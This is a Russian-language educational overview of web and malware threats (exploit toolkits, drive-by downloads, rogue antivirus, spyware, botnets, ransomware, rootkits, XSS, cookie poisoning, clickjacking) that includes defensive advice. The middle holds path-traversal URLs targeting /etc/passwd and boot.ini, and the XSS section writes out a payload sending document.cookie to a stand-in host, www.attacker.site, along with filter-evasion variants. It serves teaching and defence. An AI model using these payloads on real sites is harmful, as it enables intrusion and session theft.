Потенциально уязвимые узлы выявляются с привлечением специализированных поисковых систем. Тот факт, что многие сайты формируются с использованием баз данных, делает атаки типа SQL-injection особенно эффективными. При этом часто используется технология IFRAME. Надо сказать, что существуют и другие сходные разновидности вторжений (OS-injection, LDAP-injection, XPath-запросы), когда интерпретатору входных данных подсовываются неприемлемые параметры в надежде сломать систему.

Хакерами разработан специализированный набор инструментальных программных средств для взлома серверов и рабочих станций - toolkit. В Интернет имеется ряд общедоступных и даже коммерческих видов toolkit, например, Neosploit, MPack, Icepack, El Fiesta и Adpack. Эти средства ориентированы на использование известных классов уязвимостей браузеров (ActiveX, мультимедиа plug-ins и пр.)

Toolkit включают в себя:

• Средства для выявления особенностей программного обеспечения потенциальной жертвы (тип ОС, ее версия, вид броузера, активные процессы)
• Средства управления атакой (раз в час, раз в сутки), что усложняет детектирование атаки.
• Инструментарий для определения направления атаки (например, язык, на котором написана ОС или приложение)
• Возможность выбора типов и порядка перебора уязвимостей
• Средства расширения перечня используемых уязвимостей
• Возможности модификации стратегии атаки (вместо того, чтобы атаковать каждого посетителя имеется возможность случайного выбора жертвы), что усложняет детектирование и отслеживание атаки.
• Средства обеспечения скрытности атаки
• Динамическое изменение URL и типа распространяемого malware

Если до 2006 года включительно средства маскировки атаки не применялись, то в настоящее время это стало стандартной практикой. Сюда относятся автоматические средства полиморфизма malware, а также программы шифрования.

Одним из основных инструментов вторжения в последнее время стала атака типа "drive-by download" (загрузка файлов или скриптов без ведома хозяина). В 2008 году Symantec зарегистрировала 18 миллионов попыток такого вида вторжений. При этом могут использоваться самые разные технологии. Схема такой атаки показана на рисунке.

Логика заражения наглядно показана на рисунке ниже (см. Drive-by-Downloads, Web Malware Threats, and Protecting Your Website and Your Users). Ниже этой проблеме посвящен небольшой специальный раздел Атаки "Drive-by Download".

Реализация разновидности атаки такого типа показана на рисунке ниже (цифры 1-6 указывают на последовательность действий) . Смотри Today’s Blended Threats White Paper. Identifying and Stopping Web-based Email Attacks.

Сначала хакер взламывает какой-то легальный WEB-сервер и размещает там вредоносный код (1). Далее атакер рассылает почтовые сообщения со ссылками на зараженный сайт (2). Такие почтовые сообщения легко преодолевает антивирусные фильтры и детекторы SPAM (3). Клиент-жертва кликает на ссылке, указывающей на зараженный сайт (4).Так как сайт является легальным, переход туда осуществляется без препятствий, ведь его URL отсутствует в репутационных списках или ACL (5). После этого машина пользователя оказывается зараженной (6).

Разнообразие мультимедиа форматов также облегчает работу хакеров. Ведь пользователя обычно не удивляет необходимость загрузки новейшей версии кодека или драйвера для просмотра или прослушивания материала, размещенного на удаленном сервере. Например:

Но помимо драйвера или вместо него может быть загружен, например, spyware. Возможно также ложное уведомление о вирусе на вашей машине с предложением его удалить, если вы кликнете на соответствующей клавише. Результат здесь будет тем же, что и в случае с драйвером/кодеком. Пример такого уведомления представлен ниже.

Разумеется богатые возможности предоставляет случай, когда вы вздумаете воспользоваться через WEB-сайт услугами файлообменной сети. Здесь вам могут также предложить загрузить новую версию служебной программы, так как та, что у вас имеется, уже устарела.

Рекламные сообщения могут вас привести на некоторый сайт, где вам предлагается купить нечто через Интернет (книгу или содержимое музыкального диска). При этом вам будет предложено ввести номер вашей кредитной карты и пин-код. Товар вы вероятнее всего получите, но вскоре выяснится, что сумма на вашем счете начала на глазах таять. Существует и другая разновидность такой уловки. Вам предлагают дешевый вариант некоторой программы. Если вы покупаете ее, вместе с ней вы получите некоторую разновидность malware. Хакер совмещает "приятное с полезным". Среди таких программ (обычно дешевле 50$):

1. SpywareSecure
2. AntiVirus2008
3. AntiVirus2009
4. XPAntivirus
5. WinFixer
6. SafeStrip
7. RegistryDefender
8. VirusRemover2008
9. IEDefender
10. VirusResponseLab

Этим перечень различных уловок с WEB-сайтами не исчерпывается. Каждый день появляются новые. Так что будьте подозрительны и осторожны! Следите за качеством паролей (совет тривиальный, но по прежнему эффективный). Своевременно, желательно автоматически, обновляйте свои программные продукты. Полезно рассмотреть возможность установки WAF (WEB application Firewall).

Одним из простых способов защиты информации является ее маскирование, когда критические данные подменяются видоизмененными данными (на вид вполне правдоподобными), при сохранении форматов. Такая схема может быть применена для внешних клиентов, не обладающих требуемым уровнем доступа. Это может быть и шифрация/дешифрация, но могут быть использованы и более примитивные методы, например, все фамилии заменяются на Иванов. Подобную подмену полезно делать при отладке программ обработки корпоративных данных, чтобы избежать утечки информации. Такая задача может быть легко решена во многих организациях своими силами.

Эта атака известна также под именем "dot-dot-slash”, “directory traversal”, “directory climbing” и “backtracking”. Смотри и Slash-атаки (мой сервер хакеры также не забывают).

Возможны варианты представления "../" в виде %2e%2e%2f, ..%c0%af или %2e%2e/. возможны запросы типа:

http://some_site.com.br/../../../../some dir/некоторый_файл или
http://some_site.com.br/some-page?page=http://other-site.com.br/other-page.htm/malicius-code.php,
http://example/../../../../../etc/passwd http://example/..%255c..%255c..%255cboot.ini http://example/..%u2216..%u2216someother/file и т.д.

Аналогичной цели можно попытаться достичь используя строку http://vulnerable-page.org/cgi-bin/main.cgi?file=main.cgi .

Во многих случаях spyware функционально тождественна троянскому коню. Но сплошь и рядом она содержит в себе черты adware (выявление вкусов и интересов клиентов, при этом не следует полагаться в это случае на ее травоядный характер). Чаще всего spyware так или иначе использует браузер (см. antispyware). Как правило эти программы предпринимают меры, препятствующие ее обнаружению и удалению. В последнее время spyware стала основным средством сетевого шпионажа. Функциональность программы может варьироваться в широких пределах. Заражение возможно при посещении сомнительных WEB-сайтов, через электронную почту, посредством IM (Instant Messaging), воспользовавшись бесплатным программным обеспечением. Каждый месяц легкомысленные пользователи посещают 285 миллионов сомнительных сайтов. Одним из способов заражения является drive-by download, когда вредоносная программа загружается на машину жертвы при просмотре WEB-страницы или при прочтении почты, содержащей HTML-фрагменты. Вредоносные программы часто содержатся на серверах бесплатного программного обеспечения. Компании, производящие бесплатные программы, часто проплачиваются фирмами рекламодателями за каждый зараженный компьютер, позволяющий доставлять рекламу пользователю машины. Файлы, образующие код spyware, могут быть разбросаны по жесткому диску и способны к самовосстановленияю некоторых уничтоженных фрагментов. Особый класс spyware образуют RAT (Remote Access Trojan), предназначенные для формирования люков (черных входов в программу). В машине spyware может иметь вид обычной библиотеки DLL. Принципиальным отличием spyware от вируса является отношение создателя этих программ к деньгам. Разработчик spyware делает это исключительно ради денег, разработчиком вируса часто движит желание самоутверждения или славы. Лучшей защитой от spyware является оборона периметра с фильтрацией всех подозрительных URL. Это попутно защитит вашу сеть от многих других видов malware.

Заражение spyware может произойти, когда при просмотре какого-то сайта вам предлагают в pop-up окне нажать "невинную" кнопку или (или Continue). Может поступить уведомление, что на вашей машине обнаружен вирус и далее вас спрашивают "Удалить его?". Если вы подтвердите это действие, к вам может быть загружен вредоносный код. В последнее время spyware стали использовать и для атак DoS.

Но не следует думать, что кража персональных данных (ИНН, номера и серии паспорта, номера мобильного телефона, кредитной истории, адреса проживания, адреса e-mail и пр.) производится только в госучреждениях, после чего появляются на рынках в виде СD. Существует много легальных и полулегальных источников этих данных. Прежде всего это Интернет (серверы "Одноклассники", "Однокурсники", различные серверы бюро знакомств и т.д.). В каждом из таких источников трудно почерпнуть исчерпывающие данные о каком-то конкретном человеке, но сопоставление данных из нескольких источников может дать многое. В российских условиях все много проще, так как еще не известны случаи, когда виновники краж персональных данных и передачи их для перепродажи на рынках были хоть как-то наказаны. CD с базами данных министерства налогов и сборов, МВД, пенсионного фонда, фонда имущества и пр. может купить любой желающий за 2-3 сотни рублей. Но мере роста кредитного бизнеса и более широкого распространения кредитных карт следует ожидать бума такого рода преступлений. В качестве примера можно привести случай, когда репортер BBC смог оформить водительское удостоверение на имя министра внутренних дел со своей фотографией (данные из статьи журнала Network Security, N1, 2008). И это в стране, где к персональным данным относятся куда менее легкомысленно чем в РФ. Срок наказания в Англии за такое преступление от 2 лет. Так что уже сегодня нужно всерьез задуматься о всесторонней защите персональных данных (ведь многие хранят всю перечисленную выше информацию в файлах на своих РС).

По данным Microsoft 50% разрушений ОС или приложений у клиентов так или иначе сопряжено со spyware. Еще в 2003 году до 90% всех компьютеров содержали ту или иную программу типа spyware. Как правило пользователь не подозревает о наличие такой программы в компьютере до тех пора его работа не станет совершенно неустойчивой. Для электронной коммерции этот вид атак особенно губителен, так как подрывает доверие клиентов (но и кража интеллектуальной собственности в любых сферах предпринимательства подрывает стабильность и основы честной конкуренции). В США в настоящее время готовятся специальные законы для пресечения деятельности создателей и распространителей spyware. В настоящее время существует три принципа детектирования spyware:

1. По сигнатуре (распознавание определенных фрагментов кода).
2. По производимым действиям (например, перехват прерываний при нажатии клавиш - keylogger).
3. По результатам анализа действий с учетом контекста. Adobe Photoshop также может перехватывать прерывания от клавиатуры, но это не означает, что это работает spyware. Сигнал тревоги выдается, если подозрительные действия производятся при наличии (или отсутствии) определенных процессов.

Botnet - это распределенная совокупность вычислительных машин, управляемых из единого центра и не являющихся собственностью этого центра. Под это определение безусловно подпадает совокупность машин с ОС Windows. Ведь обновления этой операционной среды производится из единого центра и может выполняться помимо воли владельца такой машины. Вполне можно предположить, что в случае конфликта правительство США может вынудить компанию Microsoft заблокировать работу машин в определенной стране или даже разметить на них жесткие диски. Конечно, это все сугубо гипотетически, но в принципе вполне реализуемо. В сущности совокупность машин с ОС Windows не является вредоносной лишь потому, что компания Microsoft в этом не заинтересована. Смотри также WWW. World Wide Weaponization.

Индустриальный подход к взлому машин предполагает разделение труда, в этом бизнесе сформировались как минимум три группы:

• Исследователи: ищут уязвимости в приложениях и прочих программных продуктах, но, как правило, сами не занимаются взломом. Продают свои находки за деньги различным преступным структурам.
• Фермеры: формируют botnet максимально возможного размера, заражают вредоносными кодами возможно большее число машин по всему миру, пишут программы управления botnet. Для этого они:
• Пытаются извлечь нужную информацию из WEB-серверов.
• Пытаются подобрать параметры доступа путем прямого перебора
• Рассылают SPAM (содержащий вредоносные коды)
• Распространяют любые возможные виды вредоносных кодов
• Дилеры: арендуют botnet (возможно использование технологии российской разработки "partnerka" - совместное использование botnet двумя и более пользователями), осуществляют атаки по заказам клиентов или в собственных коммерческих интересах. К этому классу относятся преступники, которые теми или другими способами завладевают важной информацией и торгуют ей.

Обычно массовые атаки предпринимаются в два этапа. Сначала фермеры наращивают размеры botnet, например, путем манипулирования поисковыми серверами. Многие, вероятно, получали по почте предложение, сделать так, чтобы ваш WEB-сервер попал в десятку самых популярных. Хакеры используют эту же технологию для продвижения своих вредоносных сайтов. "Раскрутке" на поисковых серверах могут быть подвергнуты и вполне легальные, но зараженные ранее сайты. Это приводит к увеличению числа их просмотров и, как следствие, к росту числа зараженных машин. Для аналогичных целей могут использоваться и компании массовой рассылки SPAM с приложениями, содержащими вредоносные коды. На втором этапе дилеры предпринимают атаку, стремясь получить доступ к важной информации. При этом широко используются прокси-серверы, помогающие скрыть истинный источник атаки, и специальные программы, автоматизирующие процесс. Атака может предполагать попытку подбора параметров доступа, когда для этой цели используется порядка десятка машин, разбросанных по всему миру.

Ransomware, Scareware и Rouge Security

Название этого вида атаки происходит от английского слова ransom - выкуп. Эта программа предназначена для вымогательства. После попадания на машину жертвы, программа, например, шифрует рабочие файлы (имеющие определенные расширения). Машина остается в рабочем состоянии, но файлы пользователя недоступны. Ключ или пароль для расшифровки хакер предлагает прислать за вознаграждение. Возможна загрузка какого-то вредоносного кода, например вируса, и предложение избавить клиента от этой напасти за небольшое вознаграждение. Практически такая программа может быть отнесена к категории вируса или сетевого червя, при запуске которого и происходит указанное шифрование файлов. Распространение такого вида атаки получили с мая 2005 года (TROJ.RANSOM.A, Archiveus, Cryzip, MayArchive). Смотри рис. 8А, где владельца сначала запугивают (см. "Cybercriminals extorting money from Android users, Michael Kassner, May 28, 2014).

Рис. 8А. Пример ransomware-экрана

К число таких атак можно отнести таже "ложные программы безопасности" (Rogue Security Programs, их синонимом является Scareware). Эти программы загружают вредоносные программные модули, а затем оповещают пользователя об их наличии, не забыв упомянуть, какие и у кого можно приобрести средства противодействия. Смотри также Pocket E-Guide: How to Prevent Rogue Antivirus Programs in the Enterprise. В 2009 году по данным компании Symantec в мире существовало более 250 фальшивых антивирусных программных пакетов.

Следует иметь в виду, что даже если найденная вами антивирусная программа работает и не содержит вредоносных включений, она не может гарантировать безопасности, хотя бы потому, что редко обновляется или вообще не обновляется. Такая программа может породить ложное чувство безопасности. Не говоря о том, что там может содержаться сознательная дыра для определенного вида вредоносных программ. Потенциальных пользователей может сбивать с толку тот факт, что многие солидные компании также предлагают бесплатные версии таких программ. Всегда возникает вопрос, зачем платить деньги за программу, когда в Интернет предлагается вариант по описанию с той же функциональностью, но совершенно бесплатно? Причины здесь бывают самые разные. Одни компании предлагают пробную версию, будучи уверенными, что через некоторое время клиент приобретет платную версию, ведь пробная версия устарее уже через неделю. Но среди таких предложений все большую долю составляют фальсифицированные антивирусные (antimalware) программы, целью которых является вторжение. Фирменные антивирусы предоставляют комплексные решения, включающие детектирование и блокировку rootkit, встроенный Firewall, эвристические системы распознавания атак нулевого дня и т.д..

Совершая WEB-серфинг по просторам Интернет, человек может попасть на какой-то сайт, который выдаст на экран предупрежедние (см. Social engineering attack: How to remove rogue security software):

Если жертва нажмет на клавишу "REMOVE THREAT" на его машину будет загружена вредоносная программа, например, троянский конь. Время от времени эта программа может уведомлять владельца о якобы уничтоженном вирусе или черве, создавая видимость позитивной работы. А, например, раз в месяц будет предлагать обновить загруженную ранее антивирусную программу. При согласии клиента, он будет получать новую версию вредоносной программы. Иногда за эту программу просят даже заплатить (так больше доверие). Смотри также Symantec Report on Rogue Security Software. За истекший год зарегистрировано 43 миллиона попыток загрузить себе фальшивые антивирусные программы. Легкомыслие интернетчиков беспредельно!

Rootkit пожалуй самый опасный из всех вредоносных кодов, так как его практически невозможно обнаружить и крайне сложно удалить. К счастью написать программу rootkit может только программист хорошо знакомый с программированием на системном уровне. Набор программ, которые разрешают доступ с системными привилегиями. Rootkit обычно содержит в себе spyware, модули записи ввода с клавиатуры и для создания черных ходов, по своему положению в ОС rootkit является системным драйвером. Важной особенностью Rootkit является наличие средств, препятствующих детектированию наличия этих программ, а также их удалению. Версия rootkit Unreal, например, имеет возможность прятать как файлы, так и драйверы, его устройство ориентировано на блокировку работы известных программ детектирования rootkit. Этот набор программ обычно специфичен для операционной среды. Большинство антивирусных и анти-spyware программ не могут его обнаружить. В последнее время новые версии rootkit размещают свои модули в аппаратной памяти компьютерного оборудования. До настоящего времени нет средств для автоматического удаления rootkit. Разработаны варианты rootkit, встраиваемые в аппаратные элементы и модули. Каждое новое поколение rootkit оказывается все более глубоко вмонтированным в операционную систему. Некоторые легальные разработчики приложений используют технику rootkit для предотвращения модификации их программных продуктов пользователями. Последние поколения Rootkit ориентированы на более глубокое проникновение и сращивание с программами операционной среды, они используют новейшие средства и методы, разработанные для обеспечения безопасности. В 2005 году компания BMG Music Entertainment Inc. стала устанавливать rootkit на некоторые свои CD, чтобы предотвратить несанкционированное копирование (см. wp.bitpipe.com). Понятно, что такие действия находятся на грани, а иногда и за гранью закона.

Rootkit имеет две базовые функции: реализацию удаленного доступа/управления через "черный ход" и программное "прослушивание". Смотри www.rootkit.com.

Rootkit позволяет удаленно управлять компьютером (загружать и исполнять программы, получить доступ к аутентификационной информации, мониторировать активность пользователей и даже менять конфигурацию машины. При таком определении VNC (Virtual Network Computing) является примером rootkit. Т.е. следует ли считать rootkit вредоносной программой, зависит от его реализации и от того, в чьих руках он находится. При определенных обстоятельствах программа типа rootkit может противодействовать вторжениям. Другим примером rootkit можно считать программу компании Sony, противодействующую несанкционированному копированию (см. DRM. Кстати, ни одна антивирусная программа не могла обнаружить программу DRM.

Rootkit в отличие от вирусов и червей не может сам себя рассылать (во всяком случае пока). Система доставки и установки rootkit содержит в себе три составляющие части:

1. скрытую программу занесения (dropper), которая может являться частью, например, макроса, прикрепленному к электронному письму;
2. загрузчика и
3. rootkit.

Dropper запускает программу загрузки и обычно требует помощи жертвы, которую под любым предлогом убеждают кликнуть мышкой на какой-то URL-ссылке. Такая ссылка может содержаться в письме или WEB-странице. Dropper активирует программу-загрузчик (смотри anti-virus rants). Эта программа часто вызывает переполнение буфера, чтобы облегчить преодоление ограничений доступа (нужны системные полномочия), после чего выполняется собственно загрузка rootkit в память машины.

Часто для решения указанных выше проблем преодоления системы защиты ОС используются приемы социальной инженерии, известные уязвимости ОС. Все известные ОС (Linux, BSD, MacOS, Solaris и Windows) уязвимы для Rootkit. Возможны разные варианты реализации эксплойтов. Одним из наиболее изощренных разновидностей rootkit является Mebroot (2007). Он модифицирует сектор диска начальной загрузки и, встраиваясь в один из системных процессов, становится "невидимым". Он может перехватывать пароли и похищать другие конфиденциальные данные. Утилиты анализа сетевого трафика не могут обнаружить деятельность Mebroot, поскольку он хорошо маскирует передаваемую информацию внутри обычного трафика. Одним из лучших детекторов-сканеров rootkit является программа GMer.

Естественен вопрос, что нужно сделать, чтобы предотвратить внедрение Rootkit в ваш компьютер? Ответ достаточно тривиален. Не посещать сомнительные сайты, не открывать приложения писем, пришедших от незнакомых респондентов, своевременно обновлять операционную систему и приложения (для вторжения обычно используются известные уязвимости), применять локальный Firewall и антивирусную программу. Это не защитит вас полностью, но снизит вероятность заражения во много раз. Осторожность и осмотрительность может спасти многие часы, которые потребуются на восстановление или переустановку ОС и приложений.

Для детектирования rootkit надо использовать отдельный, специально сформированный диск, который пригоден для первоначальной загрузки (bootstrap). На этом диске должна быть новейшая версия программы антивирус и антируткит бизнес-класса. Смотри AVG Technologies' (formerly Grisoft) AVG Anti-Virus 8.0, Symantec's Norton AntiVirus 2008 With AntiSpyware и Webroot Software's AntiSpyware Corporate Edition with Antivirus. Программа, размещенная на одном из штатных дисков машины, будет во многих случаях неэффективной, так как некоторые rootkit делают себя невидимыми для средств уровня ОС. Вообще говоря, такой бутабельный диск для детектирования вредоносных программных включений является универсальным и может использоваться для выявления наличия и других вредных кодов. Варианты инструментария можно найти в разделе Средства для борьбы со spyware. Смотри также 10+ things you should know about rootkits и Rootkits: Is removing them even possible?.

Примером Rootkit может служить ZeroAccess (смотри Malware B-Z: Inside the Threat From Blackhole to ZeroAccess (Sophos)

В последнее время многие вредоносные программы стали содержать средства маскировки, rootkit в этом отношении не является исключением. Многие программные прерывания ОС имеют предопределенные адреса переадресации. Именно по этим адресам вредоносные коды вносят команды ухода и именно эти адреса используются для выявления наличия вредоносных кодов. Но новейшие версии rootkit научились перехватывать запросы чтения содержимого определенных адресов. Это позволяет ввести в заблуждения программы детектирования rootkit и еще более осложнить борьбу с этими вредоносными программами.

• IM. В этом случае предполагается, что имеются компьютеры с загруженным IM (сервер обмена сообщениями). Если каким-то способом вредоносный код оказывается в одном из компьютеров, то IM-клиент посылает сообщения, содержащие вредоносные ссылки всем адресатам, содержащимся в списке контактов. Если получатель воспользуется такой ссылкой (сообщение может быть послано от имени его хорошего знакомого), его машина окажется зараженной.
• Rich content. Новым подходом для загрузки вредоносных кодов является использование файлов, содержащих форматированные тексты (например, PDF, PostScript). Простого открытия такого файла достаточно для исполнения кода dropper. PDF-файлы имеют встроенный контроль, позволяющий ограничить и мониторировать доступ, но не все владельцы файлов этим пользуются.

Существует несколько разновидностей rootkit:

• Пользовательская модификация. Эта разновидность rootkit работает с административными привилегиями. Это позволяет данной разновидности rootkit модифицировать параметры безопасности и скрывать процессы, файлы, системные драйверы, сетевые порты и даже системные сервисы. Эта разновидность rootkit остается инсталлированной на заряженной машине путем копирования нужных файлов на жесткий диск и перезагрузки при каждом включении компьютера. Но такой rootkit может быть детектирован с помощью антивирусных средств. Одной из известных реализаций rootkit данного типа является Hacker Defender. Одним из первых детекторов rootkit является Rootkit Revealer.
• Модификация kernel. Хакеры понимали, что версия программы, работающей в пользовательском режиме, может быть обнаружена программой работающей на системном уровне (kernel). Это стимулировало разработку kernel rootkit, работающий на системном уровне, что делает его "невидимым" и подрывает абсолютное доверие к ОС. Примером такого rootkit может служить Da IOS rootkit, разработанный Себастьяном Муницем и ориентированный на операционную систему IOS CISCO, что делает его особенно опасным. Недостатком этого rootkit является его нестабильность. Если вы видите голубой экран без какой-либо разумной причины, это может быть результатом работы kernel rootkit.
• Гибридный rootkit. Позднее хакеры разработали новую разновидность rootkit, совмещающую преимущества предыдущих двух rootkit (стабильность и невидимость). Эта модификация в настоящее время является наиболее популярной.
• Rootkit firmware. Это уже следующий уровень изощренности. Rootkit в этом случае может быть спрятан в firmware, когда компьютер выключается. При включении машины rootkit загружается заново. Видоизмененное firmware может храниться внутри программы микропроцессора или интерфейса PCI. Даже если специализированная программа найдет и удалит rootkit, при очередной перезагрузке он будет восстановлен. На эту тему существует интересная публикация Джона Хисмана (J.Heasman) "Implementing and Detecting a PCI Rootkit".
• Виртуальные rootkit. Последнее достижение в технологии rootkit. Виртуальный rootkit работает аналогично аппаратным прогрограммам в манере программ виртуальных машин (VMware). Эта технология обеспечивает практическую невидимость вредоносного кода. Примером такого rootkit может служить The Blue Pill.

Основные симптомы заражения rootkit

Создатели rootkit уже на уровне проектирования придали ему свойства невидимости. Как правило, достаточно трудно выяснить даже с помощью специализированной программы, заражен ли компьютер этим вредоносным кодом, или нет. Но все же можно выделить некоторые симптомы, по которым можно судить с определенной вероятностью о наличии rootkit в компьютере.

• Если машина повисает или не реагирует на вводимые с клавиатуры или мышки данные, это может свидетельствовать (хотя и неоднозначно) о наличии rootkit в машине.
• Изменение конфигурации страницы в Windows без участия оператора. Это может быть, например, замена картинки screensaver'а, или исчезновения полосы заданий (taskbar).
• Неожиданное переключение WEB-страниц или неадекватное исполнение какого-либо задания из-за резкого скачка сетевого трафика. Изменение сетевого трафика является важным свидетельством размещения на компьютере вредоносного кода (rootkit, spyware и т.д.), который, например, начинает рассылку SPAM.

Если rootkit работает корректно, большинство указанных симптомов не должны проявляться. Только последний симптом - замедление работы сети, является универсальным признаком, ведь rootkit не может скрыть увеличение сетевого трафика, например, при его участии в DoS-атаке.

Полиморфизм rootkit

Полиморфизм не является характерной чертой rootkit, но исключать такую возможность было бы неосмотрительно. Сегодня это неактуально, так как и без того rootkit практически невозможно обнаружить.

Детектирование и удаление rootkit

Рекомендация своевременного обновления программного обеспечения (patch'и!), может показаться занудством, но это пока самая эффективная мера противодействия. Можно порекомендовать также Vulnerability Scanning.

Детектирование и удаления rootkit зависит от его разновидности. Сложности удаления rootkit быстро возрастают, так как риск обрушения ОС становится все более ощутимым. Если это пользовательская модификация, любое из предлагаемых ниже средств вполне подойдет.

Ваша машина станет более безопасным инструментом, если вы заблокируете работу Autorun (файл Autorun.inf) в конфигурации ОС Windows.

• F-Secure Blacklight
• RootkitRevealer
• Windows Malicious Software Removal Tool
• ProcessGuard
• Rootkit Hunter (Linux and BSD)

Проблема с использованием этих программных средств заключается в том, что никогда нельзя быть уверенным, что вы действительно удалили rootkit. следует рассмотреть и применение детектора rootkit на бутабельном CD с антивирусным сканнером, таким как BartPE. Такое средство формирует свою операционную среду и по этой причине с высокой достоверностью может детектировать rootkit (ведь он еще не загружен и не может блокировать свое детектирование). Отсюда можно сделать вывод, что надежное средство детектирования rootkit должно работать на уровне ядра системы. Возможен вариант, когда поиск rootkit выполняется до реальной загрузки ОС. Можно также рассмотреть в качестве меры детектирования отслеживание изменения размеров основных загружаемых модулей ОС. Единственным сегодня методом, гарантирующим отсутсвие rootkit, является перезагрузка ОС с фирменного дистрибутива с последующей проверкой наличия посторонних кодов с помощью Encase.

Пример модификации ядра Windows при загрузке Rootkit показан на рисунке 9. На верхней части рис. 9 представлена схема взаимодействия до загрузки rootkit. (Смотри The Essentials Series: Modern Malware Threats and Countermeasures)

Рис. 9. Пример модификации ОС при загрузке Rootkit

В заключении можно порекомендовать прочесть статью в NetworkWorld “Experts divided over rootkit detection and removal” (статье уже более двух лет, но актуальнось ее сохраняется). Существует некоторая надежда, что Intel's Trusted Platform Module (TPM) со временем решит проблему заражения вредоносными кодами. Кроме того данной проблеме посвящена книга ROOTKITS: Subverting the Windows Kernel. Смотри также Rootkit Detection

Cross-Site Scripting (CSS). (описание CSS сделано на основе Cross Site Scripting (XSS) Explained, Cross Site Scripting или http://courses.csail.mit.edu/6.857/2008/handouts/css-explained.pdf) является одной из наиболее широко распространенных сетевых атак, преследующих цель, получение персональных данных с помощью WEB-технологии (иногда этот вид атаки называют "HTML injection"). Задача решается за счет выполнения определенного Javascript'а в browser'е жертвы. При этом получается некоторая информация, содержащаяся на машине жертвы (например, cookies). Метод не наносит непосредственного вреда, но может быть прелюдией более серьезной атаки. Атакер может получить полный перечень cookies, имеющихся на машине жертвы. Смотри также http://www.veracode.com/security/xss.

Такой скрипт считывает часть HTTP-запроса (обычно параметры, реже HTTP-заголовки и проходы). Предположим, что имеется скрипт welcome.cgi, а его параметр - name. Он может работать следующим образом:

GET /welcome.cgi?name=Joe%20Hacker HTTP/1.0
Host: www.vulnerable.site

Откликом будет

<HTML>
<Title>Welcome!</Title>
Hi Joe Hacker <BR>
Welcome to our system
...
</HTML>

Атакер пытается спровоцировать клиента-жертву на нажатие своей ссылки (например, www.valnerable.site). Такая ссылка может выглядеть как:

http://www.vulnerable.site/welcome.cgi?name=<script>alert(document.cookie)</script>.

Оклик сайта будет иметь вид:

<HTML>
<Title>>Welcome!</Title>
Hi <script>alert(document.cookie)</script>
<BR>
Welcome to our system
...
</HTML>

Браузер жертвы будет интерпретировать этот отклик как страницу HTML, содержащую фрагмент кода JavaScript. Этот код при исполнении позволяет получить доступ ко всем cookies, принадлежащих сайту www.vulnerable.site. Собственно атакой является отсылка всех этих cookies атакеру. Вредоносной ссылкой может быть:

http://www.vulnerable.site/welcome.cgi?name=<script>window.open(“http://www.attacker.site/collect.cgi?cookie=”%2Bdocument.cookie)</script>

Страница же отклика должна иметь вид:

<HTML>
<Title>Welcome!</Title>
Hi
<script>window.open(“http://www.attacker.site/collect.cgi?cookie=”+document.cookie)</script>
<BR>
Welcome to our system
...
</HTML>

Броузер немедленно при загрузке этой страницы исполнит встроенный Javascript и пошлет запрос "collect.cgi script" по адресу www.attacker.site, со значением cookies = www.vulnerable.site. Cookies могут содержать аутентификационные и авторизационные данные, а это уже представляет серьезную опасность. Наглядную диаграмму диалога в случае атаки CSS можно найти в одной из ссылок, приведенных в начале описания этого типа атак.

Для запуска скрипта возможно использование не только тэгов типа <SCRIPT>. Например:

• Вместо <SCRIPT> ... </SCRIPT> можно применить <img src="javascript:..."> (удобно для узлов, где осуществляется фильтрация тэгов <SCRIPT>).
• Вместо <SCRIPT> ... </SCRIPT> можно также использовать <script src="http://...">. Такой прием применим, когда скрипт невелик или содержит скрытые символы.

Существуют средства повышения безопасности в отношении атак CSS:

1. Входная фильтрация данных и выявление определенных скриптов (детектирование метки <script> с последующим распознаванием параметра name. Этот путь имеет определенные недостатки:



• Нужно, чтобы прикладной программист хорошо разбирался в проблемах безопасности.
• Требуется перекрыть все возможные источники входных данных (параметры запроса, параметры тела POST-запроса и HTTP-заголовки.
• Метод не может защитить от уязвимостей сторонних скриптов/серверов (которые указывают проход к ресурсу).


2. Выходная фильтрация, которая предполагает просмотр данных пользователя, которые он посылает браузеру. Хорошим примером был бы скрипт, который заносит входную информацию в базу данных и в дальнейшем фильтрует информацию, которая извлекается оттуда и направляется в виде отклика.
3. Установка прикладного Firewall, который перехватывает XSS-атаки прежде чем они достигнут WEB-сервера, блокирует работу потенциально опасных скриптов. Прикладной Firewall может перекрыть все входные методы, включая скрипты третьей стороны.

Взлом WEB-приложений с помощью "отравленных" Cookie. (см. Hacking Web Applications Using Cookie Poisoning). Данный вид атаки имеет целью нарушение конфиденциальности путем манипулирования cookie сессии. При этом может быть реализована фальсификация идентичности узла или человека и хакер в этом случае может выполнять определенные действия от имени ничего неподозревающего клиента. Cookie сессии к сожалению формируются без привлечения методов, гарантирующих безопасность.

Для гарантии безопасности клиент не должен быть способен угадать (подобрать) значения идентификатора сессии другого клиента. Более того клиент не должен быть способен предугадать очередное значение идентификатора сессии. У каждого идентификатора должно быть заранее оговоренное время жизни, чтобы минимизировать урон в случае кражи идентификатора.

Разные системы (ASP.NET, Apache Tomcat, Apache JServ, PHP и т.д.) генерируют cookie по-разному (смотри cookieReport.html). В одних случаях для формирования идентификаторов используются локальные часы, в других - генератор псевдослучайных чисел. Проблема в том, что в любом варианте имеются пути относительно простых схем угадывания идентификаторов с помощью предварительного анализа и перебора.

Наиболее широко используемая схема формирования сессий предполагает создание двух cookie. Первое cookie является просто счетчиком для отличия одной сессии от другой. Вторая составляющая представляет собой число, содержащее 8 десятичных цифр. Этот идентификатор вычисляется по формуле:

Cookie2=(31415821 × (t + m) mod 100000000,

где t - время GMT в секундах с момента 01/01/1970 00:00 (задается прикладным сервером), а m - число миллисекунд на счетчике тиков прикладного сервера. Следует заметить, что t может быть получено из заголовка Date HTTP. Зная это легко написать программу, которая восстановит Cookie. Для этого нужно послать чуть больше 1000 запросов.

Clickjacking является вредоносной технологией обмана WEB-пользователей с целью получения конфиденциальной информации или осуществления перехвата управления машиной при кликаньи ссылки кажущейся совершенно безопасными WEB-страниц Fredrick Lane (2008-10-08). "Web Surfers Face Dangerous New Threat: 'Clickjacking'".. Эта уязвимость проявляется для многих броузеров и ОС, релизация атаки имеет форму кода или скрипта, исполняемого без ведома пользователя. Смотри также Sumner Lemon (2008-09-30). "Business Center: Clickjacking Vulnerability to Be Revealed Next Month"

Термин Clickjacking был предложен Jeremiah Grossman и Robert Hansen в 2008 году. Этот вид атак можно рассматривать в качестве примера проблемы Confused deputy ("запутавшийся заместитель") (смотри Robert McMillan (2008-09-17). "At Adobe's request, hackers nix 'clickjacking' talk").

